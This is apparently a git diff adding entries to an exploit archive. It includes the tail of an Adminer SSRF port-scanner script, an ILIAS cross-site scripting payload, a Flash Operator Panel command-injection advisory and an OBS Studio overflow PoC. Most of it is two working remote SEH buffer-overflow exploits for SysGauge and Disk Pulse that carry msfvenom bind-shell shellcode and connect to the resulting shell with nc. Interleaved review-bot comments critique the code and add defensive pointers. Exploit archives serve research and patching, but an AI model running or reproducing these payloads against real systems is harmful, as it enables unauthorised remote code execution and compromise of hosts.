s.close()
return None
if RES.find('401 Authorization Required')!=-1:
print '401 Authorization Required'
s.close()
return None
ver = re.findall(r'<span class="version">(.*)</span>',RES,re.DOTALL|re.MULTILINE)
if not RES:
s.close()
return None
if ver:
print 'Your Adminer '+ ver[0] + ' works for us now.'
s.close()
return ver
s.close()
return None
def scan(ADMINER,ADMINER_PORT,ADMINER_URI,TARGET,PORTS_TO_SCAN,PRINT_CLOSED,USE_SSL):
global MAX_TIME,port_range
RES=''
print 'scanning ports: %s ' % str(port_range[0])+'to ' + str(port_range[-1])+' ...'
for aPort in port_range:
aPort=str(aPort)
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(MAX_TIME)
s.connect((ADMINER,ADMINER_PORT))
if USE_SSL:
s=ssl.wrap_socket(s, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_SSLv23)
s.send('GET /'+ADMINER_URI+'/?server='+TARGET+':'+aPort+'&username= HTTP/1.1\r\nHost: '+TARGET+'\r\n\r\n')
except Exception as e:
print str(e)
s.close()
return
while True:
try:
RES=s.recv(512)
###print RES
###Should see HTTP/1.1 403 not 200
if RES.find('HTTP/1.1 200 OK')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
if RES.find('400 Bad Request')!=-1:
print '400 Bad Request, check params'
s.close()
break
raw_input()
lst=re.findall(r"([^\n<div class='error'>].*connect to MySQL server on.*[^</div>\n])|(Lost connection to MySQL server at.*)|(MySQL server has gone away.*)"+
"|(No connection could be made because the target machine actively refused it.*)|(A connection attempt failed.*)|(HTTP/1.1 200 OK.*)", RES)
if lst:
status=str(lst)
if status.find('connect to MySQL')!=-1:
if PRINT_CLOSED:
print 'port '+ aPort + ' closed'
s.close()
break
elif status.find('machine actively refused it.')!=-1:
if PRINT_CLOSED:
print 'port '+ aPort + ' closed'
s.close()
break
elif status.find('A connection attempt failed')!=-1:
if PRINT_CLOSED:
print 'port '+ aPort + ' closed'
s.close()
break
elif status.find('reading initial communication packet')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif status.find('MySQL server has gone away')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif status.find('Bad file descriptor')!=-1:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif status.find('Got packets out of order')!=-1:
print 'port '+aPort + ' open'
s.close()
break
except Exception as e:
msg = str(e)
###print msg
if msg.find('timed out')!=-1 and aPort in false_pos_ports:
print 'port '+aPort + ' open'
port_lst.append(aPort+' open')
s.close()
break
elif msg.find('timed out')!=-1:
print 'port '+aPort + ' timed out'
port_lst.append(aPort+' read operation timed out')
s.close()
break
else:
s.close()
break
if port_lst:
log(TARGET)
else:
print "Scan completed, no ports mined."
return 0
def arp(host):
args = "-a" if system_name().lower()=="windows" else "-e"
return subprocess.call("arp " + args + " " + host, shell=True) == 0
def ping_host(host):
args = "-n 1" if system_name().lower()=="windows" else "-c 1"
res=subprocess.call("ping " + args + " " + host, shell=True) == 0
if not res:
print str(host) + ' down? trying ARP'
if not arp(host):
print str(host) + ' unreachable.'
return
return res
def main():
global port_range
print BANNER
greet()
ADMINER_VERSION=False
PRINT_CLOSED=False
USE_SSL=None
ADMINER=raw_input('[+] Adminer Host/IP> ')
if ADMINER=='':
print 'Enter valid Host/IP'
ADMINER=raw_input('[+] Adminer Host/IP> ')
ADMINER_PORT=raw_input('[+] Adminer Port> ')
if not re.search("^\d{1,5}$",ADMINER_PORT):
print 'Enter a valid Port.'
ADMINER_PORT=raw_input('[+] Adminer Port> ')
ADMINER_URI=raw_input('[+] Adminer URI [the adminer-<version>.php OR adminer/ dir path] > ')
TARGET=raw_input('[+] Host/IP to Scan> ')
PORTS_TO_SCAN=raw_input('[+] Port Range e.g. 21-25> ').replace(' ','')
plst=re.findall(r"(\d{1,5})-(\d{1,5})",PORTS_TO_SCAN)
if not plst:
print 'Invalid ports, format is 1-1025'
return
raw_input() #console up
port_range=chk_ports(PORTS_TO_SCAN)
if not port_range:
return
PRINT_CLOSED=raw_input('[+] Print closed ports? 1=Yes any key for No> ')
if PRINT_CLOSED=='1':
PRINT_CLOSED=True
else:
PRINT_CLOSED=False
if not ping_host(ADMINER):
print 'host %s not reachable or blocking ping ' % ADMINER
cont=raw_input('Continue with scan? 1=Yes any key for No> ')
if cont!='1':
print 'Scan aborted.'
raw_input() #console up
return
USE_SSL=use_ssl(ADMINER,ADMINER_PORT)
time.sleep(2)
ADMINER_VERSION = version(ADMINER,ADMINER_PORT,ADMINER_URI,USE_SSL)
if not ADMINER_VERSION:
print "Can't retrieve Adminer script. check supplied URI."
raw_input() #console up
return
else:
if ADMINER_VERSION==504:
raw_input() #console up
return
if scan(ADMINER,int(ADMINER_PORT),ADMINER_URI,TARGET,PORTS_TO_SCAN,PRINT_CLOSED,USE_SSL)==0:
more=raw_input('Info: 1=Yes, any key for No> ')
if more=='1':
info()
raw_input() #console up
if __name__=='__main__':
main()
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
=============================
Vendor Notification: December 16, 2017
Vendor Acknowledgment and reply "I could disallow connecting to well-known ports" : December 18, 2017
Vendor "Adminer throttles invalid login attempts. That should help. I am not sure what else could Adminer do about this."
No more replies from vendor since : December 18, 2017
Attempt contact vendor : January 4, 2018
No more replies (unresponsive).
January 12, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
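Review bot: `arp()` and `ping_host()` concatenate the operator-typed host into a command string and run it with `shell=True`, so a value containing `;` or backticks executes arbitrary commands on the machine running the tool. Pass an argument list with no shell instead, e.g. `subprocess.call(["ping"] + args.split() + [host]) == 0` and `subprocess.call(["arp", args, host]) == 0`. `log()` also opens `PortMiner.txt` without a `with` block, so the handle is left open if a write raises. For defenders the most useful part of this file is the `other_vhosts_access.log` excerpt: repeated `?server=<ip>:<port>&username=` requests with a changing port are the pattern to alert on at the host serving Adminer.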


@ -0,0 +1,27 @@
# Exploit Title: Cross Site Scripting in ILIAS CMS 5.2.3
# Date: Apr 24, 2017
# Software Link: https://www.ilias.de
# Exploit Author: Florian Kunushevci
# Contact: https://facebook.com/florianx00
# CVE: CVE-2018-5688
# Category: webapps
1. Description
ILIAS before 5.2.4 has XSS via the cmd parameter to the displayHeader
function in setup/classes/class.ilSetupGUI.php in the Setup component.
2. Proof of Concept
Location : /setup/setup.php
Parameter : ?cmd=
Payload : "><script>alert(1)</script>
3. Solution:
https://www.ilias.de/docu/goto.php?target=lm_1719&client_id=docu
4. References:
https://nvd.nist.gov/vuln/detail/CVE-2018-5688
https://www.ilias.de/docu/goto_docu_pg_75029_35.html


@ -0,0 +1,179 @@
Document Title:
===============
Flash Operator Panel v2.31.03 - Command Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1907
Release Date:
=============
2018-01-08
Vulnerability Laboratory ID (VL-ID):
====================================
1907
Common Vulnerability Scoring System:
====================================
6.2
Vulnerability Class:
====================
Command Injection
Current Estimated Price:
========================
2.000a! - 3.000a!
Product & Service Introduction:
===============================
The most comprehensive and affordable reporting and realtime monitor package for AsteriskA(c) based Call Centers.
A new approach on getting CDR reports for your phone system, centered on the user and call direction. Top lists,
Usage pattern and real time view are included. This version works under any Linux flavor (i386, x86_64 and R-Pi3).
Versions 1.2, 1.4, 1.6, 1.8, 10, 11 and 12 with the manager interface enabled to asterisk. PHP 5 & MySQL 5: only
required for the visual phonebook, call history and recordings interface.
(Copy of the Vendor Homepage: https://www.fop2.com/index.php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote command execution in the official Flash Operator Panel v2.31.03.
Vulnerability Disclosure Timeline:
==================================
2018-01-08: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed)
Discovery Status:
=================
Published
Affected Product(s):
====================
Nicolas Gudino (Asternic)
Product: Flash Operator Panel 2 - User Control Panel (Web-Application) CentOS 2.31.03, Debian 2.31.03 & RPI-ARM 2.30.03
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A command inject web vulnerability has been discovered in the official Flash Operator Panel v2.31.03 web-application.
The security vulnerability allows remote attackers to inject own system specific commands via web-application.
The command inject web vulnerability is located in the the `command` path variable paramter of the `index.php` file.
Remote attackers with low privileged web-application user account roles are able to perform command requests via
callforward module. Thus allows an user account with restricted privileges to perform unauthorized command requests
to compromise the operator panel web-application. The request method to inject the malicious command to the index path
variable is GET. The attack is limited on exploitation to a restricted authenticated user account of the application.
The security risk of the command injection is estimated as high with a cvss (common vulnerability scoring system) count of 6.2.
Exploitation of the command inject vulnerability requires a low privileged web-application user account and no user interaction.
Successful exploitation of the vulnerability results in web-application-, database management system or web-server -compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] UCP - User Control Panel
Vulnerable File(s):
[+] index.php
Vulnerable Parameter(s):
[+] command
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction and with low privileged user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command=./&[Variable Command Inject Vulnerability!]
PoC: Vulnerable Source (command)
($_REQUEST['quietmode']) && $user !== false && !empty($user))
(isset($_REQUEST['command']) && ($_REQUEST['command'] == 'login'
$_REQUEST['command'] == 'forgot'
$_REQUEST['command'] == 'reset'))) {
$m = !empty($_REQUEST['module']) ? $_REQUEST['module'] : null;
$ucp->Ajax->doRequest($m,$_REQUEST['command']);
Note: The request can be performed by restricted user accounts of the user control panel for higher access privileges.
The main administrator can use the command parameter to attack the backend of the main administrator by the same method.
The callforward uses the command variable to execute which is the same method performed for basic restricted user accounts.
Reference(s):
http://ucp-fop.localhost:8000/
http://ucp-fop.localhost:8000/ucp/
http://ucp-fop.localhost:8000/ucp/index.php
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward
http://ucp-fop.localhost:8000/ucp/index.php?quietmode=1337&module=callforward&command
Solution - Fix & Patch:
=======================
The command injection web vulnerability can be patched by a secure approval of the command parameter in the index.php file GET method request.
Sanitize the command path variable and disallow the usage of special chars to prevent further command injection attacks.
Security Risk:
==============
The security risk of the command injection vulnerability via path variable in the web-application is estimated as high (CVSS 6.2).
Credits & Authors:
==================
Benjamin K.M. [bkm@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright A(c) 2018 | Vulnerability Laboratory - [Evolution Security GmbH]aC/
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

32
exploits/windows/dos/43596.py Executable file

@ -0,0 +1,32 @@
author = '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: OBS-Studio-20.1.3 Local Buffer Overflow Zer0Day (SEH Based PoC)
# Date: 2018.01.15
# Exploit Author: Greg Priest
# Version: OBS-Studio-20.1.3
# Tested on: Windows7 x64 HUN/ENG Enterprise
# Software Download Link: https://obsproject.com/download
'''
bug = '''
Vulnerable input field:
<1> Copy printed "AAAAA...." string to clipboard!
<2> Profile -> New
<3> Paste the string in the input then press Ok
'''
junk = "A" * 459
SEH = "BBBB"
nextSEH = "CCCC"
overflow = "D" * 19533
print author
print "String: ", junk + SEH + nextSEH + overflow
print bug
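Review bot: The header labels this an "SEH Based PoC", but the script only prints a filler string in which `SEH = "BBBB"` and `nextSEH = "CCCC"` are placeholder markers, so a reader cannot tell from the file whether it demonstrates a crash or code execution. A header comment such as `# Crash PoC only: overlong name in Profile -> New; BBBB/CCCC are markers, not addresses` would state that scope, and it matches the `dos` type the index entry gives this file. The header also records no vendor contact or fixed version, which anyone triaging OBS Studio 20.1.3 installs would look for first. The `print` statements are Python 2 syntax, which the header should say as well.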

103
exploits/windows/remote/43588.py Executable file

@ -0,0 +1,103 @@
# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2018-5359
# Version: 3.6.18
# Tested on: Windows 7 x64
# Software Link: hhttp://www.sysgauge.com/setups/sysgaugesrv_setup_v3.6.18.exe
from struct import pack
from os import system
from sys import exit
from time import sleep
import socket
port = 9221
host = '192.168.72.231'
stage1 = "\x83\xc4\x7f" *16 # metasm > add esp,127
stage1 += "\x83\xc4\x04"    # metasm > add esp,4
stage1 +=  "\xff\xe4"       # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'
buf =  ""
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"
shellcode = buf
payload = 'A' * 124             #offset
payload +=  '\xeb\x12\x90\x90'  #jmp over seh retrun value
payload += '\x3b\x38\x01\x10' * 4   # 0x1001383b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libdsm.dll]
payload += stage1
payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode
header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))
except:
    print "[-] Unable to communicate to target %s:%s" %(host,port)
    exit()
s.send(packet)
print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)
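Review bot: The connection block uses a bare `except:` that hides the real socket error and also swallows Ctrl-C, the socket `s` is never closed, and the last line builds a shell string with `system("nc %s 1337"%host)`, which becomes a local command-injection sink as soon as `host` stops being a hard-coded literal. I would narrow the handler to `except socket.error:`, add `s.close()` after the send, and pass the arguments as a list, `subprocess.call(["nc", host, "1337"])`. The msfvenom comment should also carry the caveat a lab user needs: `# lab use only: payload opens an unauthenticated bind shell on 1337/TCP, reachable by any host that can route to the target`. exploits/windows/remote/43589.py repeats the same connect/send/`system` lines and needs the same changes. Minor: the Software Link reads `hhttp://` and the status message says "tatget".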

103
exploits/windows/remote/43589.py Executable file

@ -0,0 +1,103 @@
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz
# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-15663
# Version: v10.1.18
# Tested on: Windows 7 x64
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe
from struct import pack
from os import system
from sys import exit
from time import sleep
import socket
port = 9120
host = '192.168.72.231'
stage1 = "\x83\xc4\x7f" *17 # metasm > add esp,127
stage1 += "\x83\xc4\x04"    # metasm > add esp,4
stage1 +=  "\xff\xe4"       # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'
buf =  "\x90" * 10
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"
shellcode = buf
payload = 'A' * 124             #offset
payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value
payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
payload += stage1
payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode
header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))
except:
    print "[-] Unable to communicate to target %s:%s" %(host,port)
    exit()
s.send(packet)
print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)
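Review bot: The header gives CVE-2017-15663 and the tested version but nothing a defender can act on, although the comment on the `libspp.dll` line already records the relevant fact: the module is listed with ASLR, Rebase and SafeSEH all False. I would lift that into the header, for example `# Context: libspp.dll ships without ASLR/SafeSEH; the service on 9120/TCP is reachable unauthenticated - restrict network access until a fixed build is installed`. The Description line misspells the product as "Disk Pule", and the offset comment says "retrun".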


@ -5247,6 +5247,7 @@ id,file,description,date,author,type,platform,port
40515,exploits/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",dos,android,
40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",dos,osx,
40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",dos,windows,
43596,exploits/windows/dos/43596.py,"OBS studio 20.1.3 - Local Buffer Overflow",2018-01-15,ScrR1pTK1dd13,dos,windows,
40570,exploits/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",dos,osx,
40592,exploits/windows/dos/40592.py,"SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service",2016-10-20,ERPScan,dos,windows,
40593,exploits/windows/dos/40593.py,"SAP Adaptive Server Enterprise 16 - Denial of Service",2016-10-20,ERPScan,dos,windows,
@ -9267,7 +9268,7 @@ id,file,description,date,author,type,platform,port
43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows,
43397,exploits/bsd/local/43397.md,"Sony Playstation 4 4.05 FW - Local Kernel Loader",2017-12-27,Specter,local,bsd,
43418,exploits/linux/local/43418.c,"Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)",2017-08-13,"Andrey Konovalov",local,linux,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation",2018-01-03,mr_me,local,windows,
43421,exploits/windows/local/43421.py,"Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation",2018-01-03,mr_me,local,windows,
43427,exploits/multiple/local/43427.c,"Multiple CPUs - 'Spectre' Information Disclosure",2018-01-03,Multiple,local,multiple,
43449,exploits/linux/local/43449.rb,"VMware Workstation - ALSA Config File Local Privilege Escalation (Metasploit)",2018-01-05,Metasploit,local,linux,
43465,exploits/windows/local/43465.txt,"Microsoft Windows - Local XPS Print Spooler Sandbox Escape",2018-01-08,"Google Security Research",local,windows,
@ -15809,6 +15810,9 @@ id,file,description,date,author,type,platform,port
40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",remote,hardware,
40491,exploits/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,remote,multiple,
40507,exploits/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,remote,linux,
43588,exploits/windows/remote/43588.py,"SysGauge Server 3.6.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43589,exploits/windows/remote/43589.py,"Disk Pulse Enterprise 10.1.18 - Buffer Overflow",2018-01-15,"Ahmad Mahfouz",remote,windows,
43609,exploits/hardware/remote/43609.py,"Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution",2018-01-15,mr_me,remote,hardware,
40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,remote,multiple,
40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",remote,hardware,
40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,remote,linux,1471
@ -37148,6 +37152,15 @@ id,file,description,date,author,type,platform,port
40531,exploits/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",webapps,php,
40532,exploits/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",webapps,php,
40534,exploits/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",webapps,php,
43567,exploits/php/webapps/43567.txt,"ImgHosting 1.5 - Cross-Site Scripting",2018-01-15,"Dennis Veninga",webapps,php,
43569,exploits/php/webapps/43569.txt,"Domains & Hostings Manager PRO 3.0 - Authentication Bypass",2018-01-15,Tauco,webapps,php,
43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,
43591,exploits/php/webapps/43591.txt,"RISE 1.9 - 'search' SQL Injection",2018-01-15,"Ahmad Mahfouz",webapps,php,
43592,exploits/jsp/webapps/43592.txt,"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect",2018-01-15,"Andrew Gill",webapps,jsp,
43593,exploits/php/webapps/43593.py,"Adminer 4.3.1 - Server-Side Request Forgery",2018-01-15,hyp3rlinx,webapps,php,
43594,exploits/java/webapps/43594.txt,"Oracle PeopleSoft 8.5x - Remote Code Execution",2018-01-15,"Vahagn Vardanyan",webapps,java,
43595,exploits/php/webapps/43595.txt,"ILIAS < 5.2.4 - Cross-Site Scripting",2018-01-15,"Florian Kunushevci",webapps,php,
43600,exploits/php/webapps/43600.txt,"Flash Operator Panel 2.31.03 - Command Execution",2018-01-15,Vulnerability-Lab,webapps,php,80
